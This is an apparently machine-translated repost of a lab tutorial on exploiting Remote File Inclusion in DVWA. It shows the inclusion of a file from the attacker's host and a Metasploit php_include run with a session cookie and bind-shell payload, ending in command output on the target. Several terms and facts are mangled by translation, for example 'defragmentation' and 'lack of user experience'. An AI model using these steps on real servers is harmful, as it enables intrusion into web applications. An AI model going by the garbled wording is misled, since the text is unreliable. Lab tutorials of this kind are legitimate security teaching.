قالب وردپرس درنا توس
Home / Tips and Tricks / How to Use Remote File Inclusion to Obtain a Shell «Null Byte :: WonderHowTo

How to Use Remote File Inclusion to Obtain a Shell «Null Byte :: WonderHowTo



A simple security flaw can allow an attacker to gain a foothold with little effort. When a web application allows remotely hosted files to be loaded without validation, it opens a whole can of worms, with consequences ranging from a simple website defragmentation feature to the full execution of code. Because of this, RFI can be a promising way to get a shell.

Today we will be targeting DVWA, a vulnerable web application included in the Metasploitable 2 virtual machine. Kali Linux and the Metasploit Framework serve as attack tools.

What is RFI?

Remote File Inclusion (RFI) is a type of security vulnerability in Web applications that allows an attacker to attach a remote file to the application. The file can be dynamically processed in several ways, including the execution of code on the server, the disclosure of sensitive information, and the execution of client-side code .

RFI occurs if the path of a file used as input does not exist is cleaned up properly, so that an external URL can be processed over HTTP. This type of vulnerability is most common in PHP applications, but also in ASP, JSP, and other technologies.

In this guide, we will exploit an RFI vulnerability to obtain a command shell on the target system

step 1: Initial Setup

Before we begin, we need to configure a few things to make this attack successful. First, start Metasploitable and log in with msfadmin as credentials. Next, on Kali, open DVWA in the browser and navigate to the "DVWA Security" tab. Set the security level to low .

Back to Metasploitable we need to make sure that some settings in the PHP configuration are enabled for demonstration purposes. The option allow_url_fopen allows access to files on remote hosts or servers, while the option allow_url_include of a remote file allows the use of a URL instead of a local file path. These settings can be found in the file php.ini . Edit them to make sure they are enabled with:

  sudo nano /etc/php5/cgi/php.ini

Press Ctrl-W to search for the string "allow_url" and ensure that allow_url_fopen and allow_url_include are both set to On . Press Ctrl-X Y and Enter to save the file. Restart the Apache server by entering the following command:

  sudo /etc/init.d/apache2 restart 

Next we need to create a test file to look for RFI. Create the file in / var / www / html on our Kali machine so that it is accessible from a web browser.

  nano /var/www/html/test.php

Enter a text such as "vulnerable to RFI!" and save the file. Now restart Apache and we should go well.

  service apache2 restart 

Step 2: Check RFI

To check if an RFI vulnerability exists, we can simply ask the web application in question to retrieve the previously created file. In DVWA, go to the "File Inclusion" page and replace the requested page with the path of our test file hosted on Kali.

  http://172.16.1.102/dvwa/vulnerabilities/fi/?page=http: //172.16.1.100/test.php 

When the page loads, we can see the text from our test file, the indicates that this page is indeed vulnerable to RFI.

From here we could try to manually invoke a shell by uploading a script, but there is a handy Metasploit module that still supports this process makes it easier.

Step 3: Exploit & Get Shell

The first thing we need to do is get some cookie information for this exploit to work properly. In DVWA, reload the page and use "Check Item" to view the request.

We Need the Cookie Information Containing the Security Level and Session ID

Start Metasploit by typing msfconsole in the terminal. We will use the module php_include; Locate it by typing Search php_include . Now enter to load the module with exploit / unix / webapp / php_include . From here we can see the settings:

  msf exploit (unix / webapp / php_include)> Options

Module options (exploit / unix / webapp / php_include):

Name Current setting required Description
---- --------------- -------- -----------
HEADERS no No additional HTTP headers to send, cookies for example. Format: "Header: Value, Header2: Value2"
PATH / yes The base directory prefixed by the URL being tested
PHPRFIDB /usr/share/metasploit-framework/data/exploits/php/rfi-locations.dat no A local file containing a list of URLs to try, with XXpathXX replacing the URL
PHPURI no The URI to request with the include parameter changed in XXpathXX
POSTDATA no The POST data to send with the include parameter changed in XXpathXX
Proxies no A proxy chain of the format type: host: port [,type:host:port][...]
     RHOST yes The destination address
RPORT 80 yes The destination port (TCP)
SRVHOST 0.0.0.0 Yes The local host to listen to. This must be an address on the local computer or 0.0.0.0
SRVPORT 8080 yes The local port to listen to.
SSL false no Negotiate SSL / TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host

Exploit target:

ID name
- ----
0 Automatic 

First, set the destination address to the IP address of Metasploitable. Next, set the header option to the cookie value we received earlier. We also need to set the path to the page's home directory, followed by the specific URI you want to request. Metasploit automatically detects the endpoint for the attack by replacing the parameter with XXpathXX .

  msf exploit (unix / webapp / php_include)> set rhost 172.16.1.102
rhost => 172.16.1.102
msf exploit (unix / webapp / php_include)> Set header "Cookie: security = low; PHPSESSID = 4c0c7c70dfafab05e7d04c88c8966aee"
headers => cookie: security = low; PHPSESSID = 4c0c7c70dfafab05e7d04c88c8966aee
msf exploit (unix / webapp / php_include)> set path / dvwa / vulnerabilities / fi /
Path => / dvwa / vulnerabilities / fi /
msf exploit (unix / webapp / php_include)> set phpuri /? page = XXpathXX
phpuri => /? page = XXpathXX 

Now we can choose a payload.

  msf exploit (unix / webapp / php_include)> Show payload

Compatible payloads
======================

Name Disclosure Date Rank Description
---- --------------- ---- -----------
generic / custom normal custom payload
generic / shell_bind_tcp normal Generic command shell, bind TCP inline
generic / shell_reverse_tcp normal generic command shell, reverse TCP inline
php / bind_perl normal PHP command shell, Bind TCP (via Perl)
php / bind_perl_ipv6 normal PHP command shell, Bind TCP (via Perl) IPv6
php / bind_php normal PHP command shell, Bind TCP (via PHP)
php / bind_php_ipv6 normal PHP command shell, Bind TCP (via PHP) IPv6
php / download_exec normal PHP Executable Download and Execute
php / exec execute normal PHP command
php / meterpreter / bind_tcp normal PHP meterpreter, Bind TCP Stager
php / meterpreter / bind_tcp_ipv6 normal php meterpreter, Bind TCP Stager IPv6
php / meterpreter / bind_tcp_ipv6_uuid normal PHP meterpreter, bind TCP Stager IPv6 with UUID support
php / meterpreter / bind_tcp_uuid normal PHP meterpreter, Bind TCP Stager with UUID support
php / meterpreter / reverse_tcp normal php meterpreter, php reverse TCP stager
php / meterpreter / reverse_tcp_uuid normal php meterpreter, php reverse TCP stager
php / meterpreter_reverse_tcp normal php meterpreter, reverse TCP inline
php / reverse_perl normal PHP command, double reverse TCP connection (via Perl)
php / reverse_php normal PHP command shell, reverse TCP (via PHP)
php / shell_findsock normal PHP command shell, search sock 

Set this to a simple PHP bind shell and type run to start the exploit.

  msf exploit (unix / webapp / php_include)> set payload php / bind_php
Payload => php / bind_php
Execute msf exploit (unix / webapp / php_include)>

[*] 172.16.1.102:80 - Using the URL: http://0.0.0.0:8080/VTve3BEQtgo
[*] 172.16.1.102:80 - Local IP: http://172.16.1.100:8080/VTve3BEQtgo
[*] 172.16.1.102:80 - PHP include server started.
[*] Begins the Bind TCP handler against 172.16.1.102:4444
[*] Command Shell Session 1 has been opened (172.16.1.100:37679 -> 172.16.1.102:4444) at 2018-09-05 11:48:37 -0500

I would
uid = 33 (www data) gid = 33 (www data) Groups = 33 (www data)
uname -a
Linux metsploitable 2.6.24-16-server # 1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU / Linux 

A session opens and we can issue commands like id and , uneame -a to see information about the system that now has a shell

prevent RFI

RFI can be a particularly nasty vulnerability, especially if an attacker can get a shell and execute commands like us have demonstrated. Fortunately, it is easier to prevent RFI than you think.

The most effective method of prevention is not to use files as user-supplied input. This dramatically reduces the attack surface, making it almost impossible for an adversary to trap malicious files. If this is not possible, the application can whitelist the contained files.

Modern versions of PHP typically disable the allow_url_include option by default, which prevents attackers from remotely deploying malicious files

Wrapping RFI

RFI, like many other vulnerabilities in web applications, comes from a lack of user experience – in this case, file paths that allow the application to load a remote file. This can lead to dangerous effects, eg. For example, disclosure of confidential information and code execution. We learned how to test this vulnerability, and finally got a shell on the target using a helpful Metasploit module. Although RFI can occur in different types of applications, the number of outdated and insecure PHP applications on the Internet makes this particular vulnerability interesting.


Source link